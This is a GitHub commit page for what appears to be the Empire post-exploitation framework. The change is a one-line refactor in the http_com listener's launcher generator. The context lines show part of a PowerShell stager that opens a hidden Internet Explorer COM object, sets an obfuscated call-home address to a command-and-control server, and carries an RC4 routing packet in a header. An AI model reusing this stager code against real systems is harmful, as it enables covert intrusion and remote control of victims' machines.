Skip to content

Commit

Permalink
fixed moved function in http_com listener (#306)
Browse files Browse the repository at this point in the history
  • Loading branch information
Cx01N authored Mar 19, 2022
1 parent d1f5a79 commit fac9506
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion empire/server/listeners/http_com.py
Original file line number Diff line number Diff line change
Expand Up @@ -261,7 +261,7 @@ def generate_launcher(
b64RoutingPacket = base64.b64encode(routingPacket)

stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += f"$ser={ data_util.obfuscate_call_home_address(host) };$t='{ stage0 }';"
stager += f"$ser={ helpers.obfuscate_call_home_address(host) };$t='{ stage0 }';"

# add the RC4 packet to a header location
stager += f'$c="{ requestHeader }: { b64RoutingPacket }'
Expand Down

0 comments on commit fac9506

Please sign in to comment.